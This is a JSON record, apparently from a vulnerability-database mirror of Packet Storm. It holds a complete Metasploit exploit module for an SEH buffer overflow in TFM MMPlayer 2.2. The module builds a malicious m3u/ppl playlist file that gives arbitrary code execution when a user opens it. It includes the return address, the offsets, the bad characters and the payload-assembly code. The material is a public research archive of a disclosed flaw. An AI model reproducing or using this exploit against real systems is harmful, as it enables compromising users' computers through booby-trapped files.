{"type": "packetstorm", "published": "2012-06-16T00:00:00", "reporter": "RjRjh Hack3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d443c46cc5648daa967ca889cc77279e"}, {"key": "modified", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "07f24ccbbaa87722e9a75dfc7bd3e0e3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "dc9bcc7a5d0595d6398f8f2303a1ce57"}, {"key": "sourceData", "hash": "e99ec0752153c780f2620723a31073ff"}, {"key": "sourceHref", "hash": "5605952b5ceebabca6d629e0ea61c214"}, {"key": "title", "hash": "20b983231530b2c3ae12cbc8d9ec3946"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in MMPlayer 2.2 \nThe vulnerability is triggered when opening a malformed M3U/PPL file \nthat contains an overly long string, which results in overwriting a \nSEH record, thus allowing arbitrary code execution under the context \nof the user. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'RjRjh Hack3r', # Original discovery and exploit \n'Brendan Coles <bcoles[at]gmail.com>' # msf exploit \n], \n'References' => \n[ \n[ 'OSVDB', '80532' ], \n[ 'BID', '52698' ], \n[ 'EDB', '18656' ], # .m3u \n[ 'EDB', '18657' ] # .ppl \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'seh', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested on: \n# Windows XP Pro SP3 - English \n# Windows Vista SP1 - English \n# Windows 7 Home Basic SP0 - English \n# Windows 7 Ultimate SP1 - English \n# Windows Server 2003 Enterprise SP2 - English \n[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe \n], \n'Payload' => \n{ \n'Size' => 4000, \n'BadChars' => \"\\x00\\x0a\\x0d\", \n'DisableNops' => false \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 23 2012', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl']) \n], self.class) \n \nend \n \ndef exploit \n \nnops = make_nops(10) \nsc = payload.encoded \noffset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length) \njmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes \nnseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes \nnseh << Rex::Text.rand_text_alphanumeric(2) \nseh = [target.ret].pack('V') \n \nsploit = nops \nsploit << sc \nsploit << offset \nsploit << jmp \nsploit << nseh \nsploit << seh \n \n# write file \nfile_create(sploit) \n \nend \nend \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:47", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/113764/TFM-MMPlayer-m3u-ppl-File-Buffer-Overflow.html", "sourceHref": "https://packetstormsecurity.com/files/download/113764/tfm_mmplayer_m3u_ppl_bof.rb.txt", "title": "TFM MMPlayer (m3u/ppl File) Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "vulnersScore": 6.8}, "references": [], "id": "PACKETSTORM:113764", "hash": "f7baa6a821eab2743cd7ed7d50d1764d5efef5094b1c564d62fc9720c6b95ff2", "edition": 1, "cvelist": [], "modified": "2012-06-16T00:00:00", "description": ""}

{}